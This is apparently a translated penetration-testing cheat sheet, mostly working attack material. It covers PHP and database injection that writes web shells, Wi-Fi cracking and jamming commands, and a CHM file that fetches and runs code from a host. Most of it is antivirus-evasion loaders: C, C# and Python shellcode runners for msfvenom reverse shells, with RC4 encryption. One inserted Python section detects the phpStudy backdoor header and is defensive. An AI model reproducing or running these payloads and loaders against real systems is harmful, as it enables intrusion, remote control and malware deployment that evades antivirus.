          INSERT INTO pma__column_info SELECT '1', 'foo', 'bar', 'baz', 'plop', 'plop', 'plop', 'plop', '../../../../../../../../tmp/sess_***', 'plop';
          Visit /tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1

          PHP-FPM RCE

          >git clone https://github.com/neex/phuip-fpizdam.git
          >cd phuip-fpizdam
          >go get -v && go build
          >go run . http://127.0.0.1/index.php
          http://127.0.0.1/index.php?a=id
          Run it several times if the first attempt does not work.

          phpstudy backdoor

          PHP 5.2.17 / 5.4.45
          GET / HTTP/1.1
          Host: 127.0.0.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
          Accept-Encoding:gzip,deflate
          Accept-Charset:c3lzdGVtKCJuZXQgdXNlciIpOw==
          Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
          Connection: close
          Upgrade-Insecure-Requests: 1
          Cache-Control: max-age=0
          Content-Length: 2
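          The request above is recognisable on the wire: a legitimate Accept-Charset holds charset names, never strict base64 that decodes to PHP code. As an added defensive example, not part of the original notes, here is a check that flags such requests in captured traffic or access logs; the two requests are constructed and the function names are mine.

```python
import base64
import re

# The backdoored php_xmlrpc.dll evaluates a base64 PHP string carried in the Accept-Charset
# (or Accept-Encoding) request header, exactly as in the request above.
PHP_CALL = re.compile(r"\b(system|eval|exec|shell_exec|passthru|assert|file_put_contents)\s*\(", re.I)
SUSPECT_HEADERS = ("accept-charset", "accept-encoding")

def parse_headers(raw_request: str) -> dict:
    """Return {lower-case header name: value} from a raw HTTP request."""
    head = raw_request.split("\r\n\r\n", 1)[0].replace("\r\n", "\n")
    headers = {}
    for line in head.split("\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def decode_base64(value: str):
    """Strict base64 decode; real charset/encoding lists (commas, dashes, ';q=') never pass."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except ValueError:          # binascii.Error is a ValueError subclass
        return None

def detect_phpstudy_backdoor(raw_request: str):
    """Return {'header': name, 'payload': decoded PHP} when a header carries PHP code, else None."""
    headers = parse_headers(raw_request)
    for name in SUSPECT_HEADERS:
        decoded = decode_base64(headers.get(name, ""))
        if decoded and PHP_CALL.search(decoded):
            return {"header": name, "payload": decoded}
    return None

# Constructed requests: the first reproduces the header pattern shown above.
BACKDOOR_REQUEST = (
    "GET / HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    "Accept-Encoding:gzip,deflate\r\n"
    "Accept-Charset:c3lzdGVtKCJuZXQgdXNlciIpOw==\r\n"
    "Connection: close\r\n\r\n"
)
NORMAL_REQUEST = (
    "GET / HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n\r\n"
)

if __name__ == "__main__":
    print(detect_phpstudy_backdoor(BACKDOOR_REQUEST))
    print(detect_phpstudy_backdoor(NORMAL_REQUEST))
```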

          cmdhijack

          From: https://hackingiscool.pl/
          PoC, the full command line:
          cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe"
          Possible impact includes denial of service, information disclosure and arbitrary code execution, depending on the target application and system.
          Take a web application as an example.
          Because escapeshellcmd() is used it is not directly vulnerable to command injection; a PoC using this method:


          Not limited to any particular position or file.
          Extending the idea, for example powershell with -enc or mshta (see https://lolbas-project.github.io/): because of how Windows behaves, when the whole string cannot be resolved to a valid path the part after the space is split off, and the & character can be used here, for example:
          >cmd.exe /c "cmd /c /../../../../../../../../../../windows/system32/calc&powershell -enc xxxx"
          >cmd.exe /c "cmd /c /../../../../../../../../../../windows/system32/calc&mshta http://192.168.0.105:8080/xsuUEWJ.hta"

          Database

          MSSQL

          Identify the database:
          ;and (select count(*) from sysobjects)>0       mssql
          ;and (select count(*) from msysobjects)>0      access
          List databases:
          ?id=1 and (select top 1 Name FROM Master..SysDatabases)>0 --
          ?id=1 and (select top 1 Name FROM Master..SysDatabases where name not in ('master'))>0 --
          List tables:
          import requests
          import re

          table_list = ['']

          def get_sqlserver_table(table_list, table_num):
              for num in range(0,table_num):
                  # print("','".join(table_list))
                  sql_str = "and (select top 1 name from [xxxx].sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('{}'))>0".format("','".join(table_list))
                  url = "http://www.xxxxx.cn/x.aspx?cid=1' {} AND 'aNmV'='aNmV".format(sql_str)
                  r = requests.get(url, headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'})
                  res = re.search(r'\'(.*)\'', r.content.decode('utf-8'),  re.M|re.I)
                  table_name = str(res.group(1))
                  table_list.append(table_name)
                  print("[{}] - TableName: {}".format(str(r.status_code), table_name))

          if __name__ == "__main__":
              get_sqlserver_table(table_list, 16)
          Check whether xp_cmdshell exists:
          and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')
          Run a command:
          ;exec master..xp_cmdshell "net user name password /add"--
          Check privileges:
          and (select IS_SRVROLEMEMBER('sysadmin'))=1--   // sa
          and (select IS_MEMBER('db_owner'))=1--   // dbo
          and (select IS_MEMBER('public'))=1--   // public
          Separated web and database servers: obtain the database server's IP
          ;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;', 'select * from dest_table') select * from src_table;--
          LOG backup:
          ;alter database testdb set RECOVERY FULL --
          ;create table cmd (a image) --
          ;backup log testdb to disk = 'c:\wwwroot\shell.asp' with init --
          ;insert into cmd (a) values ('<%%25Execute(request("chopper"))%%25>')--
          ;backup log testdb to disk = 'c:\wwwroot\shell.asp' --
          SQL Server 2000 differential backup:
          ;backup database testdb to disk ='c:\wwwroot\bak.bak';--
          ;create table [dbo].[testtable] ([cmd] [image]);--
          ;insert into testtable (cmd) values(<hex-encoded web shell>);--
          ;backup database testdb to disk='c:\wwwroot\upload\shell.asp' WITH DIFFERENTIAL,FORMAT;--
          SQL Server 2005 differential backup:
          ;alter/**/database/**/[testdb]/**/set/**/recovery/**/full--
          ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[testdb]/**/to/**/disk=@d/**/with/**/init--
          ;create/**/table/**/[itpro]([a]/**/image)--
          ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init--
          ;insert/**/into/**/[itpro]([a])/**/values(<hex-encoded web shell>)--
          ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=<SQL_EN encoding of the web shell's save path>/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init--
          ;drop/**/table/**/[itpro]--
          ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init--

          PostgreSQL

          Connect:
          >psql -U dbuser -d exampledb -h 127.0.0.1 -p 5432
          Version:
          >select version();
          List databases:
          >select datname from pg_database;
          List all tables:
          >select * from pg_tables;
          Read accounts and passwords:
          >select usename,passwd from pg_shadow;
          Current user:
          >select user;
          Change a password:
          >alter user postgres with password '123456';
          List a directory:
          >select pg_ls_dir('/etc');
          Read a file:
          >select pg_read_file('postgresql.auto.conf',0,100);   # offset and length
          &
          >drop table wooyun;
          >create table wooyun(t TEXT);
          >copy wooyun FROM '/etc/passwd';
          >select * from wooyun limit 1 offset 0;
          &
          >select lo_import('/etc/passwd',12345678);
          >select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=12345678 order by pageno)a;
          Write a file:
          create table shell(shell text not null);
          insert into shell values($$<?php @eval($_POST[1]);?>$$);
          copy shell(shell) to '/var/www/html/shell.php';
          &
          copy (select '<?php phpinfo();?>') to '/var/www/html/shell.php';
          Brute force with MSF:
          >use auxiliary/scanner/postgres/postgres_login
          Command execution (versions below 8.2):
          >create function system(cstring) returns int AS '/lib/libc.so.6', 'system' language C strict;
          >create function system(cstring) returns int AS '/lib64/libc.so.6', 'system' language C strict;
          >select system('id');

          Close-access (on-site) attacks

          Wi-Fi cracking

          wifite

          The Kali tool wifite. Load the card and enable monitor mode:
          #airmon-ng check kill
          #airmon-ng start wlan1
          Install hcxtools v4.2.0 or later and hcxdumptool v4.2.0 or later:
          #apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
          #git clone https://github.com/ZerBea/hcxtools
          #cd hcxtools
          #make
          #make install
          #git clone https://github.com/ZerBea/hcxdumptool
          #cd hcxdumptool
          #make
          #make install
          #wifite --dict /root/Desktop/wordlist.txt   load a wordlist

          Aircrack-ng

          #airmon-ng start wlan0                                  enable monitor mode
          #airodump-ng wlan0mon                                   view traffic
          #airodump-ng -c 1 --bssid APmac -w name wlan1mon        capture the packets of one AP
          #aireplay-ng --deauth 10 -a APmac wlan0mon              deauth attack
          #aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon   deauth a specific client until the handshake is captured
          #airmon-ng stop wlan0mon                                disable monitor mode
          #aircrack-ng -w wordlist.txt name.cap                   crack the password with a wordlist

          Rogue (phishing) networks

          Hostapd

          #apt install hostapd dnsmasq
          #cd /etc/hostapd
          #vim open.conf        create an open (unencrypted) hotspot
          interface=wlan1
          ssid=FreeWIFI
          driver=nl80211
          channel=1
          hw_mode=g
          #vim /etc/dnsmasq.conf
          dhcp-range=10.0.0.1,10.0.0.255,12h
          interface=wlan1
          #systemctl restart dnsmasq
          Remove the NIC restrictions:
          #nmcli radio wifi off
          #rfkill unblock wlan
          #ifconfig wlan1 10.0.0.1/24
          #hostapd open.conf
          Sniffing:
          #sysctl -w net.ipv4.ip_forward=1
          #iptables -t nat -A POSTROUTING -o <uplink interface> -j MASQUERADE
          #bettercap -iface wlan1
          #net.show
          #net.sniff on
          #driftnet -i wlan1

          Hostapd-wpe

          #apt install hostapd-wpe
          #vim /etc/hostapd-wpe/hostapd-wpe.conf
          Configure:
          interface=wlan1
          ssid=
          channel=
          Certificate changes:
          #cd /etc/hostapd-wpe/certs/
          In ca.cnf, server.cnf and client.cnf edit countryName, stateOrProvinceName, localityName, ...
          #rm -rf *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt*
          #make clean
          #./bootstrap
          #make install
          Start the hotspot:
          #hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
          When a challenge/response is captured, crack it with asleap:
          #asleap -C <challenge> -R <response> -W <wordlist>

          Wireless jamming

          Beacon flood

          Switch the card to monitor mode first:
          #airmon-ng start wlan1
          Create many fake hotspots:
          mdk3 mon0 b
          #mdk3 wlan1mon b -f /root/wifi.txt -a -s 1500

          Deauth flood

          Against an AP:
          #airmon-ng start wlan1
          #aireplay-ng --deauth 10 -a <AP MAC address> mon0
          Against the clients of an AP:
          #airmon-ng start wlan1                                  put the card in monitor mode
          #airodump-ng wlan1mon --bssid <target AP BSSID>
          #aireplay-ng -0 0 -a <AP BSSID> -c <client MAC> wlan0mon   start the attack

          Mdk3 destruction

          Against everything in range:
          #mdk3 wlan1mon d
          Against one AP:
          #airodump-ng wlan1mon
          #mdk3 wlan1mon a -a APmac        launch the attack
          Blacklist:
          #mdk3 wlan1mon d -c <channel> -b /blacklist.txt
          #mdk3 wlan1mon b -n test -w -g -c 1 -s 200

          The esp8266 Wi-Fi chip

          Mdk4

          #mdk4 wlan0mon d

          CVE-2018-4407

          Scapy:
          send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
          Affected:
          Apple iOS 11 and earlier: all devices (and some devices upgraded to iOS 12)
          Apple macOS High Sierra (up to 10.13.6): all devices (fixed in Security Update 2018-001)
          Apple macOS Sierra (up to 10.12.6): all devices (fixed in Security Update 2018-005)
          Apple OS X El Capitan and earlier: all devices

          Bypassing MAC address authentication

          Ifconfig
          #ifconfig wlan1 down
          #ifconfig wlan1 hw ether xx:xx:xx:xx:xx:xx
          #ifconfig wlan1 up
          Macchanger
          #macchanger -m xx:xx:xx:xx:xx:xx wlan1
          #macchanger -r wlan1

          BadUSB

          Card cloning

          Bluetooth

          Spear phishing

          Phishing e-mail

          Spoofed internal domain
          Spoofed external domain
          Look-alike domain
          Compromised account, mass or targeted sending
          Fabricated scenario / malicious link / malicious attachment

          CVE

          CVE-2017-11882
          Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016
          CVE-2017-0199
          Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1
          CVE-2012-0158
          Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4 and 2008 SP2, SP3 and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2 and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0
          CVE-2017-0143
          Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511 and 1607; and Windows Server 2016
          Office documents / PDF files

          Executable files

          Forged document files

          Extension / icon

          Binding

          0day

          CHM

          Load malicious code from a compiled HTML help file. Insert the code into the HTML file and compile it with EasyCHM. Generate a powershell-format payload with the MSF web_delivery module and run it through Rundll32 with MyJSRat, which produces no pop-up window.
          Base64-encode the command to avoid special characters.
          Encoded execution statement:
          >powershell -ep bypass -enc …
          Run the PowerShell callback command through JSRat: https://github.com/Ridter/MyJSRat
          >python MyJSRat.py -i 192.168.1.107 -p 8888 -c "powershell -ep bypass -enc JABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAQgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAKACQAQgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoASQBFAFgAIAAkAEIALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADAANwA6ADgAMAA4ADAALwBQAEsAUQBOAEUAYgAnACkAOwAKAA=="
          Open http://ip/wtf, copy the exploit statement into the HTML file, then compile it:
          <PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.0.107:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
          Opening the CHM file normally gives a session with no pop-up.

          Phishing links

          URL redirection

          Combined with a malicious document or program

          Short URLs

          Combined with a watering-hole attack

          Look-alike domains

          Domain theft

          Spear phishing through third-party services

          Build a relationship over social software, for example as a partner, mentor and apprentice, HR, or a business enquiry, and then phish.

          AV evasion

          MSF evasion

          nps_payload

          >python nps_payload.py                     generate normally
          >msfconsole -r msbuild_nps.rc              start the listener
          >%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe xx.xml
          >wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
          When msbuild exits normally the session is lost, so save the following as a .bat, run it, and migrate the process as soon as a session is obtained:
          @echo off
          echo [*] Please Wait, preparing software ..
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\xxx.xml
          exit

          Encoders

          >set EnableStageEncoding true
          >set stageencoder x86/fnstenv_mov       encode the stage for evasion
          >set stageencodingfallback false
          &
          >msfvenom --list encoders                list the available encoders

          C/C++ source-level evasion

          >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f c -o 1.c
          -i 20 encodes 20 times. The MSF listener needs automatic process migration: set autorunscript migrate -n explorer.exe

          Function-pointer execution

          unsigned char buf[] = "shellcode";
          #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // no console window for a Windows console program
          main(){
              ( (void(*)(void))&buf)();
          }
          Build with VC6.0 and run on the test machine.
          Currently does not get past Huorong; 360 static and dynamic scanning are bypassed.

          Allocating dynamic memory

          #include <Windows.h>
          #include <stdio.h>
          #include <string.h>
          #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // no console window for a Windows console program
          unsigned char buf[] = "shellcode";
          main(){
              char *Memory;
              Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
              memcpy(Memory, buf, sizeof(buf));
              ((void(*)())Memory)();
          }

          Inline assembly

          #include <windows.h>
          #include <stdio.h>
          #pragma comment(linker, "/section:.data,RWE")
          unsigned char shellcode[] = "";
          void main(){
              __asm
              {
                  mov eax, offset shellcode
                  jmp eax
              }
          }

          Forced type cast

          #include <windows.h>#include <stdio.h>unsigned char buf[] ="";void main(){ ((void(WINAPI*)(void))&buf)();}

          Junk assembly instructions

          #include <windows.h>
          #include <stdio.h>
          #pragma comment(linker, "/section:.data,RWE")
          unsigned char shellcode[] = "";
          void main()
          {
              __asm
              {
                  mov eax, offset shellcode
                  _emit 0xFF
                  _emit 0xE0
              }
          }

          XOR encryption

          https://github.com/Arno0x/ShellcodeWrapper
          Install it and generate a raw-format payload:
          >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f raw -o shell.raw
          Encrypt:
          >python shellcode_encoder.py -cpp -cs -py shell.raw thisiskey xor
          Compile the generated .py with py2exe and run it; compile the generated .cs with csc.exe and run it; compile the generated .cpp with VC6.0 (remove the precompiled header) and run it.

          Remote thread injection

          Currently gets past Huorong but not 360; can be combined with other techniques.
          Create a new C++ console project in VS, right-click Properties and set "Use of MFC" to "Use MFC in a Static Library".
          Generate C-format shellcode and paste it into remote inject.cpp.
          Build the project; it connects back successfully and starts a calc process.


          Loader-based AV evasion

          shellcode_launcher
          https://github.com/clinicallyinane/shellcode_launcher/
          Generate the payload (raw):
          >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f raw -o shellcode.raw
          Load it with the launcher:
          >shellcode_launcher.exe -i shellcode.raw

          SSI loader
          https://github.com/DimopoulosElias/SimpleShellcodeInjector
          Generate the payload (C):
          >msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f c -o shellcode.c
          Convert it to the encoded form:
          >cat shellcode.c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"http://g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
          Start the MSF listener. The injector can be compiled with MinGW:
          >gcc SimpleShellcodeInjector.c -o xxx.exe
          Run:
          >xxx.exe <encoded shellcode>

          C# source-level AV evasion

          Compile directly

          Generate the payload. The MSF listener needs automatic process migration: set autorunscript migrate -n explorer.exe
          >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
          Start the MSF listener and paste the payload at the marked position:

          using System;
          using System.Runtime.InteropServices;

          namespace TCPMeterpreterProcess
          {
              class Program
              {
                  static void Main(string[] args)
                  {
                      byte[] shellcode = new byte[] { payload here };
                      UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                      Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
                      IntPtr hThread = IntPtr.Zero;
                      UInt32 threadId = 0;
                      // prepare data
                      IntPtr pinfo = IntPtr.Zero;
                      // execute native code
                      hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
                      WaitForSingleObject(hThread, 0xFFFFFFFF);
                  }

                  private static UInt32 MEM_COMMIT = 0x1000;
                  private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

                  [DllImport("kernel32")]
                  private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
                  [DllImport("kernel32")]
                  private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);
                  [DllImport("kernel32")]
                  private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
                  [DllImport("kernel32")]
                  private static extern bool CloseHandle(IntPtr handle);
                  [DllImport("kernel32")]
                  private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
                  [DllImport("kernel32")]
                  private static extern IntPtr GetModuleHandle(string moduleName);
                  [DllImport("kernel32")]
                  private static extern UInt32 GetProcAddress(IntPtr hModule, string procName);
                  [DllImport("kernel32")]
                  private static extern UInt32 LoadLibrary(string lpFileName);
                  [DllImport("kernel32")]
                  private static extern UInt32 GetLastError();
              }
          }

          Create a C# .NET Framework console application in Visual Studio and build it; the result gets past the AV.

          Encryption

          Generate the payload. The MSF listener needs automatic process migration: set autorunscript migrate -n explorer.exe
          >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
          Paste the payload in, then compile the encryptor:

          using System;
          using System.Collections.Generic;
          using System.IO;
          using System.Linq;
          using System.Security.Cryptography;
          using System.Text;
          using System.Threading.Tasks;
          using System.Reflection;
          using System.Runtime.CompilerServices;
          using System.Runtime.InteropServices;

          namespace Payload_Encrypt_Maker
          {
              class Program
              {
                  // Encryption key; it can be changed as long as KEY is the same in the encrypt and decrypt sources
                  static byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
                  static byte[] IV = { 0x00, 0xcc, 0x00, 0x00, 0x00, 0xcc };
                  static byte[] payload = { payload here };    // replace with the MSF-generated shellcode

                  private static class Encryption_Class
                  {
                      public static string Encrypt(string key, string data)
                      {
                          Encoding unicode = Encoding.Unicode;
                          return Convert.ToBase64String(Encrypt(unicode.GetBytes(key), unicode.GetBytes(data)));
                      }

                      public static byte[] Encrypt(byte[] key, byte[] data)
                      {
                          return EncryptOutput(key, data).ToArray();
                      }

                      private static byte[] EncryptInitalize(byte[] key)
                      {
                          byte[] s = Enumerable.Range(0, 256)
                              .Select(i => (byte)i)
                              .ToArray();
                          for (int i = 0, j = 0; i < 256; i++)
                          {
                              j = (j + key[i % key.Length] + s[i]) & 255;
                              Swap(s, i, j);
                          }
                          return s;
                      }

                      private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
                      {
                          byte[] s = EncryptInitalize(key);
                          int i = 0;
                          int j = 0;
                          return data.Select((b) =>
                          {
                              i = (i + 1) & 255;
                              j = (j + s[i]) & 255;
                              Swap(s, i, j);
                              return (byte)(b ^ s[(s[i] + s[j]) & 255]);
                          });
                      }

                      private static void Swap(byte[] s, int i, int j)
                      {
                          byte c = s[i];
                          s[i] = s[j];
                          s[j] = c;
                      }
                  }

                  static void Main(string[] args)
                  {
                      byte[] result = Encryption_Class.Encrypt(KEY, payload);
                      int b = 0;
                      for (int i = 0; i < result.Length; i++)
                      {
                          b++;
                          if (i == result.Length + 1)
                          { Console.Write(result[i].ToString()); }
                          if (i != result.Length) { Console.Write(result[i].ToString() + ","); }
                      }
                  }
              }
          }

          Compile the decryptor:

          using System;
          using System.Collections.Generic;
          using System.Linq;
          using System.Text;
          using System.Runtime.InteropServices;
          using System.Threading;
          using System.Reflection;
          using System.Runtime.CompilerServices;

          namespace NativePayload_Reverse_tcp
          {
              public class Program
              {
                  public static void Main()
                  {
                      Shellcode.exec();
                  }
              }

              class Shellcode
              {
                  public static void exec()
                  {
                      string Payload_Encrypted;
                      Payload_Encrypted = "payload here";
                      string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(',');
                      byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
                      for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
                      {
                          byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
                          _X_to_Bytes[i] = current;
                      }
                      // Decryption key; it can be changed as long as KEY is the same in the encrypt and decrypt sources
                      byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
                      byte[] MsfPayload = Decrypt(KEY, _X_to_Bytes);
                      // load the shellcode
                      IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);
                      Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);
                      CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);
                      Thread.Sleep(2000);
                  }

                  public static byte[] Decrypt(byte[] key, byte[] data)
                  {
                      return EncryptOutput(key, data).ToArray();
                  }

                  private static byte[] EncryptInitalize(byte[] key)
                  {
                      byte[] s = Enumerable.Range(0, 256)
                          .Select(i => (byte)i)
                          .ToArray();
                      for (int i = 0, j = 0; i < 256; i++)
                      {
                          j = (j + key[i % key.Length] + s[i]) & 255;
                          Swap(s, i, j);
                      }
                      return s;
                  }

                  private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
                  {
                      byte[] s = EncryptInitalize(key);
                      int i = 0;
                      int j = 0;
                      return data.Select((b) =>
                      {
                          i = (i + 1) & 255;
                          j = (j + s[i]) & 255;
                          Swap(s, i, j);
                          return (byte)(b ^ s[(s[i] + s[j]) & 255]);
                      });
                  }

                  private static void Swap(byte[] s, int i, int j)
                  {
                      byte c = s[i];
                      s[i] = s[j];
                      s[j] = c;
                  }

                  [DllImport("kernel32.dll")]
                  public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
                  [DllImport("kernel32.dll")]
                  public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
              }
          }

          XOR/AES encoding

          Similar to the XOR encryption above.

          CSC + InstallUtil

          Generate the payload. The MSF listener needs automatic process migration: set autorunscript migrate -n explorer.exe
          >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
          Paste the payload into InstallUtil-Shellcode.cs and compile it with csc:
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\Users\y\Desktop\shell.exe C:\Users\y\Desktop\InstallUtil-ShellCode.cs
          Run:
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe

          Python source-level AV evasion

          pyinstaller build loading C-format shellcode

          Generate a C-format payload. The MSF listener needs automatic process migration: set autorunscript migrate -n explorer.exe
          >msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c
          Paste the shellcode into shellcode+c.py. On a 32-bit system install python, py2exe and pyinstaller, go to C:\Python27\Scripts and package the py as an exe:
          >python pyinstaller-script.py -F -w shellcode.py
          A dist folder is created in the directory; the exe is inside.

          pyinstaller build loading Python-format shellcode (*)

          Generate a py-format payload. The MSF listener needs automatic process migration: set autorunscript migrate -n explorer.exe
          >msfvenom -p windows/meterpreter/reverse_tcp LPORT=12138 LHOST=192.168.0.108 -e x86/shikata_ga_nai -i 11 -f py -o /var/www/html/1.py
          Paste the shellcode into shellcode+py.py. On a 32-bit system install python, py2exe and pyinstaller, go to C:\Python27\Scripts and package the py as an exe:
          >python pyinstaller-script.py --console --onefile shellcode.py
          A dist folder is created in the directory; the exe is inside.



          Packaging an exe with py2exe

          Generate a raw-format payload. The MSF listener needs automatic process migration: set autorunscript migrate -n explorer.exe
          >msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/shell.py
          On a 32-bit system install python and py2exe, and create setup.py in the same directory:

          from distutils.core import setup
